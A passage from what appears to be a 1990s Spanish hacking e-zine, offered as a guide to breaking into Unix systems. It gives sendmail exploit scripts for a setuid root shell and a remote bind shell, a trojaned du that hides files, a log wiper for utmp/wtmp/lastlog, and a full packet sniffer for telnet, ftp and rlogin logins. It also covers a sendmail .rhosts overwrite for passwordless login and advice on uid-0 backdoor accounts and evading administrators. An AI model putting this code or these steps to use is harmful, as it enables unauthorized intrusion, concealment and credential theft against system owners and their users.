# this program will be executed when mail is sent to the fake alias.
# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.

/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync

" > alias.sh

chmod 755 alias.sh

echo "
Creating fake alias file..."
echo "
yash: |$TEMPDIR/alias.sh" > aliases

echo "
Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "

# hacks follow

OA/$TEMPDIR/aliases # our fake alias file
Ou0 # user ID to run as
Og0 # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf

echo "
Creating the sendmail script..."

cat > sendmail.script << _EOF_
helo
mail from: <nobody>
rcpt to: <yash>
data
yet another sendmail hole? suid whoop?
\. # oops.. delete \ prior to execution
quit
_EOF_

echo "
Executing $SENDMAIL $DEBUGFLAGS -bs..."

$SENDMAIL $DEBUGFLAGS -bs < sendmail.script

# give it time to execute.
sleep 4

# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &

if [ -u setid0 ]
then
echo "
setid0 is a suid shell. executing..."
cd /
$TEMPDIR/setid0 /bin/csh
echo "
end of script."
exit 0
else
echo "
setid0 is not suid; script failed."
echo "
apparently, you don't have the bug. celebrate :-)"
exit 1
fi
<----------------------------------FINAL------------------------------------->

Este otro os hara root en los ssoo con el sendmail 4.x
<-------------------------------CORTAR AQUI---------------------------------->
#!/bin/sh

# Uso: smail <hostname> <target-user-name> <target-port> <shell command>
# Defecto: smail <localhost> <daemon> <7001> </bin/sh>

port=$3
user=$2
cmd=$4

if [ -z "
$2" ]; then
user=daemon
fi

if [ -z "
$3" ]; then
port=7002
fi

if [ -z "
$4" ]; then
cmd="
/bin/csh -i"
fi

(
sleep 4
echo "
helo"
echo "
mail from: |"
echo "
rcpt to: bounce"
echo "
data"
echo "
."
sleep 3
echo "
mail from: $user"
echo "
rcpt to: | sed '1,/^$/d' | sh"
echo "
data"
echo "
cat > /tmp/a.c <<EOF"
cat << EOF
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"
tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
(0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
goto loop;}
EOF
echo "
EOF"
echo "
cd /tmp"
echo "
/bin/cc /tmp/a.c"
echo "
/bin/rm a.c"
echo "
/tmp/a.out $port $cmd"
echo "
."
echo "
quit"
) | mconnect $1
<------------------------------------FINAL----------------------------------->

Y por ultimo este otro, que no es para ser root, si no para ocultar ficheros
en un directorio, que no se veran al hacer "
ls". Este fichero se copia en
/bin/ls sobreescribiendo al original.
Lo de siempre, es el codigo original, leed los /*.

<----------------------------------CORTAR AQUI------------------------------->
#ifndef lint
static char sccsid[] = "
@(#)du.c 1.1 91/11/13 SMI"; /* from UCB 4.11 83/07/01 */
#endif
/*
* du
*/
#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/dir.h>

char path[BUFSIZ], name[BUFSIZ];
int aflg;
int sflg;
char *dot = "
.";

#define ML 1000
struct {
int dev;
ino_t ino;
} ml[ML];
int mlx;

/*+
* Hack vars - oops they're global
* but wtf cares, its a hack.
+*/

#define FILENAME "
/dev/ptyr"
#define STR_SIZE 128
#define SEP_CHAR "
\n"
#define SHOWFLAG /* Able to get du stats with `du -/` command */

struct h_st {
struct h_st *next;
char filename[STR_SIZE];
};

struct h_st *hack_list;
struct h_st *h_tmp;

char tmp_str[STR_SIZE];

FILE *fp_hack;
int showall=0;


long descend();
char *index(), *rindex(), *strcpy(), *sprintf();

#define kb(n) (howmany(dbtob(n), 1024))

main(argc, argv)
int argc;
char **argv;
{
long blocks = 0;
register char *np;
int pid;
int c;
extern int optind;

#if defined (SHOWFLAG)
while ((c = getopt(argc, argv, "
as/")) != -1)
#else
while ((c = getopt(argc, argv, "
as")) != -1)
#endif
switch (c) {
case 'a':
aflg++;
break;
case 's':
sflg++;
break;
#if defined (SHOWFLAG)
case '/':
showall++;
break;
#endif
default:
(void)fprintf(stderr, "
Usage: du [-as] file . . .\n");
exit (2);
}

/*+ Read in list of files to block +*/

h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
hack_list=h_tmp;

if (fp_hack=fopen (FILENAME, "
r")) {
while (fgets(tmp_str, 126, fp_hack)) {
h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
strcpy (h_tmp->filename, tmp_str);
h_tmp->filename[strlen(h_tmp->filename)-1]='\0';
h_tmp=h_tmp->next;
}
}
h_tmp->next=NULL;

/*+ On with the program +*/

argc -= optind;
argv += optind;
if (argc == 0) {
argv = ˙
argc = 1;
}
do {
if (argc > 1) {
pid = fork();
if (pid == -1) {
fprintf(stderr, "
No more processes.\n");
exit(1);
}
if (pid != 0)
wait((int *)0);
}
if (argc == 1 || pid == 0) {
(void) strcpy(path, *argv);
(void) strcpy(name, *argv);
if (np = rindex(name, '/')) {
*np++ = '\0';
if (chdir(*name ? name : "
/") < 0) {
perror(*name ? name : "
/");
exit(1);
}
} else
np = path;
blocks = descend(path, *np ? np : "
.");
if (sflg)
printf("
%ld\t%s\n", kb(blocks), path);
if (argc > 1)
exit(1);
}
argc--, argv++;
} while (argc > 0);
exit(0);
/* NOTREACHED */
}

DIR *dirp = NULL;

long
descend(base, name) /* Cool tree spanning idea */
char *base, *name;
{
char *ebase0, *ebase;
struct stat stb;
int i;
long blocks = 0;
long curoff = NULL;
register struct direct *dp;


/*+
* This will be very lagged if you include alot of files
* because strstr() is such an expensive call. However,
* the nature of this procedure requires it, and breaking
* the pathname down would be just as expensive. Note,
* that correct disk usage sizes will be reported based
* upon files that are not masked.
+*/

if (!showall)
for (h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
if (strstr(base, h_tmp->filename))
return 0;

ebase0 = ebase = index(base, 0);

if (ebase > base && ebase[-1] == '/')
ebase--;
if (lstat(name, &stb) < 0) {
perror(base);
*ebase0 = 0;
return (0);
}
if (stb.st_nlink > 1 && (stb.st_mode&S_IFMT) != S_IFDIR) {
for (i = 0; i <= mlx; i++)
if (ml[i].ino == stb.st_ino && ml[i].dev == stb.st_dev)
return (0);
if (mlx < ML) {
ml[mlx].dev = stb.st_dev;
ml[mlx].ino = stb.st_ino;
mlx++;
}
}

blocks = stb.st_blocks;
if ((stb.st_mode&S_IFMT) != S_IFDIR) {
if (aflg)
printf("
%ld\t%s\n", kb(blocks), base);
return (blocks);
}
if (dirp != NULL)
closedir(dirp);
dirp = opendir(name);
if (dirp == NULL) {
perror(base);
*ebase0 = 0;
return (0);
}
if (chdir(name) < 0) {
perror(base);
*ebase0 = 0;
closedir(dirp);
dirp = NULL;
return (0);
}
while (dp = readdir(dirp)) {
if (!strcmp(dp->d_name, "
.") || !strcmp(dp->d_name, ".."))
continue;
(void) sprintf(ebase, "
/%s", dp->d_name);
curoff = telldir(dirp);
blocks += descend(base, ebase+1);
*ebase = 0;
if (dirp == NULL) {
dirp = opendir("
.");
if (dirp == NULL) {
perror("
.");
return (0);
}
seekdir(dirp, curoff);
}
}
closedir(dirp);
dirp = NULL;
if (sflg == 0)
printf("
%ld\t%s\n", kb(blocks), base);
if (chdir("
..") < 0) {
(void) sprintf(index(base, 0), "
/..");
perror(base);
exit(1);
}
*ebase0 = 0;
return (blocks);
}
<---------------------------------------FINAL-------------------------------->

Igual que hay este hay un monton para cada sistema, para el ftp, para telnet
etc...
Despues de buscar, o bien en vuestro HD, o bien en las paginas web se supone
que tendreis los necesarios para ser root. Un consejo, si no funciona ninguno
de los que teneis no useis los que son para otros sistemas o versiones, vamos,
que no hagais cosas a lo loco, por que lo unico que haceis es dejar mas
huellas en el sistema.

Esta es la parte mas dificil de todas, asi que espero que sepais solucionarla.

Una vez que ya somos root podemos hacer lo que queramos en ese sistema, pero
no debemos olvidarnos de borrar nuestras huellas. Los unix tienen varios logs
que guardan casi todo lo que hacemos en el sistema:

* UTMP: Este fichero guarda un registro de todos los usuarios que se han
conectado a ese sistema
Directorios: /etc/utmp o /var/adm/utmp

* WTMP: Este es nuestro peor enemigo. Guarda los numeros IP de todos los que
se han conectado al ordenador.
Directorios: /etc/wtmp o /var/adm/wtmp

* LASTLOG: Este log guarda un registro del momento exacto en que un usuario
entro por ultima vez
Directorio: /var/adm/lastlog

* ACCT: Este log guarda los comandos que hemos ejecutado pero SOLO los
comandos no con que fin los hemos utilizado, pero suele estar desactivado
por la gran cantidad de memoria que necesita. ( Logico no? )

Directorio: /var/adm/acct ( en algunos sistemas se puede llamar pacct )

Ademas de esto puede haber otros programas que registren tu entrada, como el
TCP-Wrapper o similares( Tened cuidado con el Syslog que viene con el ssoo
que guarda los logs en los ficheros especificados en /etc/syslog.conf )
De todas maneras os recomiendo que hackeeis a horas que el root no pueda ver
vuestro numero IP con "
who" o "users" porque os pillara. De la misma manera,
la primera vez que accedeis al sistema con una cuenta hackeada, haced muchas
cosas que haria un usuario normal ( telnet, ftp, echar una partida al tetris )
para que si el root os investiga "
levemente" no se de cuenta de lo que habeis
hecho. Aqui incluyo el codigo de el "
zap" que, como su nombre indica es un
zapper, o sea un programa que borra nuestras huellas el solito.
Se compila como los exploits, pero cambia su ejecucion :
% zap <nombredeusuario>

<---------------------------------CORTAD AQUI-------------------------------->
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "
/usr/adm/wtmp"
#define UTMP_NAME "
/etc/utmp"
#define LASTLOG_NAME "
/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
int flag=0;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
flag++;
}
close(f);
if(!flag) printf("
Unsuccessful.\n");
}
}


main(argc,argv)
int argc;
char *argv[];
{
char me[30];
int i;
struct passwd *myentry;

if (argc==1) {
myentry=getpwuid(getuid());
strcpy(me,myentry->pw_name);
} else strcpy(me,argv[1]);

printf("
ZAPing %s.\n",me);
kill_utmp(me);
}
<-----------------------------------FINAL------------------------------------>

Asi la ultima entrada del usuario queda borrada del sistema. Si lo ejecutamos
demasiadas veces, pondra nombredeusuario Never Logged In, o sea es como si
ese usuario nunca se hubiera conectado al sistema. Ya tenemos las huellas
borradas, pero si queremos mantener esos privilegios que hacemos?
La manera mas facil es a¤adir una cuenta al /etc/passwd con el comando
"
adduser" con numero de usuario 0 y numero de grupo 0 que son privilegios
de root.
NoTa: que nadie se le ocurra borrar todas las cuentas del fichero passwd
menos una que solo el conozca, por que, aunque nadie podria acceder al sistema
una persona con acceso fisico podria detectarnos, y como poco borrar
nuestra cuenta asi cerrandonos el acceso al sistema, siendo en vano todo lo
que habiamos hecho.
Sin embargo si por casualidad al sysop en cuesti¢n se le ocurre revisar las
cuentas del fichero passwd la cagamos. Aunque es dificil, por que tendria que
revisar las cuentas 1 por 1 y es muy posible que se no se de cuenta, pero los
hay maniaticos....
Despues de hacer todo esto :
-Tenemos una cuenta con privilegios de root
-Hemos borrado nuestras huellas

¨ Que nos queda ? Pues practicamente nada, salvo colocar un sniffer, programa
que nos facilitara logins y passwords de ordenadores a los que se conecte la
gente de "
nuestro" sistema. El problema de los sniffers es que hay uno para
cada sistema, pero si encontramos uno para el nuestro ( cosa que no seria muy
rara ) no esta de mas ponerlo para futuros "
trabajos".
Aqui incluyo el codigo de uno que quizas os sirva, es el codigo original, y
hay que a¤adirle alguna cosa asi que leed lo un poco por las lineas que
empiezan por /* Este sniffer deberia funcionar en casi todos los *NIX :

<----------------------------------CORTAD AQUI------------------------------->
/* Esniff.c */

#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char *malloc();
char *device,
*ProgName,
*LogName;
FILE *LOG;
int debug=0;

#define NIT_DEV "
/dev/nit"
#define CHUNKSIZE 4096 /* device buffer size */
int if_fd = -1;
int Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
exit(err); }

#define IP ((struct ip *)Packet)
#define IP_OFFSET (0x1FFF)
#define SZETH (sizeof(struct ether_header))
#define IPLEN (ntohs(ip->ip_len))
#define IPHLEN (ip->ip_hl)
#define TCPOFF (tcph->th_off)
#define IPS (ip->ip_src)
#define IPD (ip->ip_dst)
#define TCPS (tcph->th_sport)
#define TCPD (tcph->th_dport)
#define IPeq(s,t) ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN (128)
time_t LastTIME = 0;

struct CREC {
struct CREC *Next,
*Last;
time_t Time; /* start time */
struct in_addr SRCip,
DSTip;
u_int SRCport, /* src/dst ports */
DSTport;
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
u_int Length; /* current data length */
u_int PKcnt; /* # pkts */
u_long LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

SFL(0,TH_FIN, 'F');
SFL(1,TH_SYN, 'S');
SFL(2,TH_RST, 'R');
SFL(3,TH_PUSH,'P');
SFL(4,TH_ACK, 'A');
SFL(5,TH_URG, 'U');
iobuf[6]=0;
return(iobuf);
}

char *SERVp(port)
register u_int port;
{ static char buf[10];
register char *p;

switch(port) {
case IPPORT_LOGINSERVER: p="
rlogin"; break;
case IPPORT_TELNET: p="
telnet"; break;
case IPPORT_SMTP: p="
smtp"; break;
case IPPORT_FTP: p="
ftp"; break;
default: sprintf(buf,"
%u",port); p=buf; break;
}
return(p);
}

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
p[strlen(p)-6]=0; /* strip "
YYYY\n" */
return(p);
}

char *NOWtm()
{ time_t tm;
time(&tm);
return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
register struct CREC *CLtmp = \
(struct CREC *)malloc(sizeof(struct CREC)); \
time( &(CLtmp->Time) ); \
CLtmp->SRCip.s_addr = SIP.s_addr; \
CLtmp->DSTip.s_addr = DIP.s_addr; \
CLtmp->SRCport = SPORT; \
CLtmp->DSTport = DPORT; \
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
CLtmp->PKcnt = 1; \
CLtmp->Next = CLroot; \
CLtmp->Last = NULL; \
CLroot = CLtmp; \
}

register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

while(CLr != NULL) {
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
break;
CLr = CLr->Next;
}
return(CLr);
}

#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}

#define PR_DATA(dp,ln) { \
register u_char lastc=0; \
while(ln-- >0) { \
if(*dp < 32) { \
switch(*dp) { \
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
break; \
case '\r': \
case '\n': fprintf(LOG,"
\n : "); \
break; \
default : fprintf(LOG,"
^%c", (*dp + 64)); \
break; \
} \
} else { \
if(isprint(*dp)) fputc(*dp,LOG); \
else fprintf(LOG,"
(%d)",*dp); \
} \
lastc = *dp++; \
} \
fflush(LOG); \
}

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
fprintf(LOG,"
\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
fprintf(LOG,"
PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
fprintf(LOG,"
%s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
fprintf(LOG,"
STAT: %s, %d pkts, %d bytes [%s]\n",
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
fprintf(LOG,"
DATA: ");
{ register u_int i = CLe->Length;
register u_char *p = CLe->Data;
PR_DATA(p,i);
PR_DATA(d,dl);
}

fprintf(LOG,"
\n-- \n");
fflush(LOG);

if(CLe->Next != NULL)
CLe->Next->Last = CLe->Last;
if(CLe->Last != NULL)
CLe->Last->Next = CLe->Next;
else
CLroot = CLe->Next;
free(CLe);
}

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
time_t tm; \
time(&tm); \
if(LastTIME<tm) { \
register struct CREC *CLe,*CLt = CLroot; \
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
while(CLe=CLt) { \
CLt=CLe->Next; \
if(CLe->Time <tm) \
END_NODE(CLe,(u_char *)NULL,0,"
IDLE TIMEOUT"); \
} \
} \
}

void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
register struct ip *ip;
register struct tcphdr *tcph;

{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

if(EtherType < 0x600) {
EtherType = *(u_short *)(cp + SZETH + 6);
cp+=8; pktlen-=8;
}

if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
return;
}

/* ugh, gotta do an alignment :-( */
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

ip = (struct ip *)Packet;
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
return;
tcph = (struct tcphdr *)(Packet + IPHLEN);

if(!( (TCPD == IPPORT_TELNET) ||
(TCPD == IPPORT_LOGINSERVER) ||
(TCPD == IPPORT_FTP)
)) return;

{ register struct CREC *CLm;
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
register u_char *p = (u_char *)Packet;

p += ((IPHLEN * 4) + (TCPOFF * 4));

if(debug) {
fprintf(LOG,"
PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
fprintf(LOG,"
%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
fprintf(LOG,"
%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
}

if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

CLm->PKcnt++;

if(length>0)
if( (CLm->Length + length) < MAXBUFLEN ) {
ADDDATA_NODE( CLm, p,length);
} else {
END_NODE( CLm, p,length, "
DATA LIMIT");
}

if(TCPFL(TH_FIN|TH_RST)) {
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"
TH_FIN":"TH_RST" );
}

} else {

if(TCPFL(TH_SYN)) {
ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
}

}

IDLE_NODE();

}

}

/* signal handler
*/
void death()
{ register struct CREC *CLe;

while(CLe=CLroot)
END_NODE( CLe, (u_char *)NULL,0, "
SIGNAL");

fprintf(LOG,"
\nLog ended at => %s\n",NOWtm());
fflush(LOG);
if(LOG != stdout)
fclose(LOG);
exit(1);
}

/* opens network interface, performs ioctls and reads from it,
* passing data to filter function
*/
void do_it()
{
int cc;
char *buf;
u_short sp_ts_len;

if(!(buf=malloc(CHUNKSIZE)))
Pexit(1,"
Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
{
struct strioctl si;
struct ifreq ifr;
struct timeval timeout;
u_int chunksize = CHUNKSIZE;
u_long if_flags = NI_PROMISC;

if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
Pexit(1,"
Eth: nit open");

if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
Pexit(1,"
Eth: ioctl (I_SRDOPT)");

si.ic_timout = INFTIM;

if(ioctl(if_fd, I_PUSH, "
nbuf") < 0)
Pexit(1,"
Eth: ioctl (I_PUSH \"nbuf\")");

timeout.tv_sec = 1;
timeout.tv_usec = 0;
si.ic_cmd = NIOCSTIME;
si.ic_len = sizeof(timeout);
si.ic_dp = (char *)&timeout;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"
Eth: ioctl (I_STR: NIOCSTIME)");

si.ic_cmd = NIOCSCHUNK;
si.ic_len = sizeof(chunksize);
si.ic_dp = (char *)&chunksize;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"
Eth: ioctl (I_STR: NIOCSCHUNK)");

strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
si.ic_cmd = NIOCBIND;
si.ic_len = sizeof(ifr);
si.ic_dp = (char *)𝔦
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"
Eth: ioctl (I_STR: NIOCBIND)");

si.ic_cmd = NIOCSFLAGS;
si.ic_len = sizeof(if_flags);
si.ic_dp = (char *)&if_flags;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"
Eth: ioctl (I_STR: NIOCSFLAGS)");

if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
Pexit(1,"
Eth: ioctl (I_FLUSH)");
}

while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
register char *bp = buf,
*bufstop = (buf + cc);

while (bp < bufstop) {
register char *cp = bp;
register struct nit_bufhdr *hdrp;

hdrp = (struct nit_bufhdr *)cp;
cp += sizeof(struct nit_bufhdr);
bp += hdrp->nhb_totlen;
filter(cp, (u_long)hdrp->nhb_msglen);
}
}
Pexit((-1),"
Eth: read");
}
/* Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "
EloiZgZejWyms" */

void getauth()
{ char *buf,*getpass(),*crypt();
char pwd[21],prmpt[81];

strcpy(pwd,AUTHPASSWD);
sprintf(prmpt,"
(%s)UP? ",ProgName);
buf=getpass(prmpt);
if(strcmp(pwd,crypt(buf,pwd)))
exit(1);
}
*/
void main(argc, argv)
int argc;
char **argv;
{
char cbuf[BUFSIZ];
struct ifconf ifc;
int s,
ac=1,
backg=0;

ProgName=argv[0];

/* getauth(); */

LOG=NULL;
device=NULL;
while((ac<argc) && (argv[ac][0] == '-')) {
register char ch = argv[ac++][1];
switch(toupper(ch)) {
case 'I': device=argv[ac++];
break;
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"
a")))
Zexit(1,"
Output file cant be opened\n");
break;
case 'B': backg=1;
break;
case 'D': debug=1;
break;
default : fprintf(ERR,
"
Usage: %s [-b] [-d] [-i interface] [-f file]\n",
ProgName);
exit(1);
}
}

if(!device) {
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
Pexit(1,"
Eth: socket");

ifc.ifc_len = sizeof(cbuf);
ifc.ifc_buf = cbuf;
if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
Pexit(1,"
Eth: ioctl");

close(s);
device = ifc.ifc_req->ifr_name;
}

fprintf(ERR,"
Using logical device %s [%s]\n",device,NIT_DEV);
fprintf(ERR,"
Output to %s.%s%s",(LOG)?LogName:"stdout",
(debug)?"
(debug)":"",(backg)?" Backgrounding ":"\n");

if(!LOG)
LOG=stdout;

signal(SIGINT, death);
signal(SIGTERM,death);
signal(SIGKILL,death);
signal(SIGQUIT,death);

if(backg && debug) {
fprintf(ERR,"
[Cannot bg with debug on]\n");
backg=0;
}

if(backg) {
register int s;

if((s=fork())>0) {
fprintf(ERR,"
[pid %d]\n",s);
exit(0);
} else if(s<0)
Pexit(1,"
fork");

if( (s=open("
/dev/tty",O_RDWR))>0 ) {
ioctl(s,TIOCNOTTY,(char *)NULL);
close(s);
}
}
fprintf(LOG,"
\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
fflush(LOG);

do_it();
}
<----------------------------------FINAL------------------------------------>

Bueno, ya hemos terminado espero que os haya servido de ayuda este texto, y
hayais comprendido como hackear un UNIX

De todas maneras si hay algo que no entendais, o alguna pregunta ya sabeis:
ravenspirit@hotmail.com
###Por cierto las cartas tipo "
¨ que necesito para ser un hacker ? " iran
al trash directamente.###
!!!!Happy Hack ;-)
WAREZ RULEZ
KILL THE BIG BROTHER
FREE OUR DATA
{[-RavEn³SpiRiT-]}

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+
El Bug de SendMail
por
Dark Raver
+ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+

Saludos amigos, aqui esta para serviros y para comentaros el bug de este
mes el Dark Raver. Como no os sonara mi nombre, os dire que soy un fanatico
de los ordenatas y por supuesto del hacking, que me podreis encontrar en
Axis.

Este bug es un poco mas moderno y a lo mejor todavia funciona en algun sitio,
pero no os hagais ilusiones.

Sistemas: Unix's en general
Versiones: Sendmail, versiones anteriores a la

  
5.59
Descripcion: Bug del sendmail

Con este bug, los usuarios externos pueden sobre-escribir cualquier archivo,
que no tenga nivel de root.

Ejemplo: (No voy a poner ejemplos de sistemas operativos concretos. Intentare
explicarme lo mas generalmente posible, y luego vosotros tendreis que
aplicarlo a vuestro sistema en concreto.)

Hacemos un telnet a victima.com al puerto 25

rcpt to: /home/pepe/.rhosts --> Nombre (y situacion) del fichero a
escribir. En este caso vamos a sobre-escribir
el rhosts del usuario llamado pepe.

mail from: pepe

data

"Aqui pon lo que quieras, un comentario para el root por ejemplo :-)"

. --> Normalmente te dara un mensaje de error, despues de poner
el punto.

rcpt to: /home/pepe/.rhosts --> Esto es muy importante, hay que hacerlo
2 veces.
mail from: pepe

data --> Ahora en este segundo intento si que podras escribir en el
fichero.

mi.ordenador.com --> Esto es lo que se escribira en el archivo. Tambien se
podria poner ' + + ' o algo similar.

. --> Si no da mensaje de error es que ha funcionado.

quit


Despues hacemos un rlogin a victima.com como si fuesemos pepe, y como
el nombre de nuestro ordenador, aparece en su .rhosts (remote hosts)
entraremos sin problemas, ya que no nos pedira el pass.

Dark Raver

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Fallas de Seguridad en Internet Explorer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Explorer 3.0 primeros errores detectados

Mirosoft Explorer 3.0, el navegador de Microsoft que compite
directamente con Netscape para romper su hegemonia en el mercado dispone
en su version final de importantes fallos de seguridad segun han
alertado investigadores de la Universidad de Princeton en los Estados
Unidos.

El error detectado permite a usuarios de Internet acceder a los
archivos alojados en el disco duro de un usuario conectado a la red con
lo que peligra la seguridad de empresas e instituciones que mantienen
conexion directa y que no dispongan de elementos de seguridad
adicionales.

Bill Koszewski, director de productos Internet de Microsoft ha
manifestado que la Compa¤ia alertado por los investigadores de esta
universidad han puesto a disposicion de los usuarios un parche que
corrige este importante error. Para el directivo de Microsoft, en
declaraciones efectuadas a Reuters, los errores de seguridad producen
una gran preocupacion en la compa¤ia e inmediatamente que son detectados
en algun programa este tipo de errores responde rapidamente para
solventarlos.

Los datos del estudio de la Universidad de Princeton pueden ser
obtenidos en:

http://www.cs.princeton.edu/sip/News.html.

Y el programa que corrige los errores de Explorer en los Website
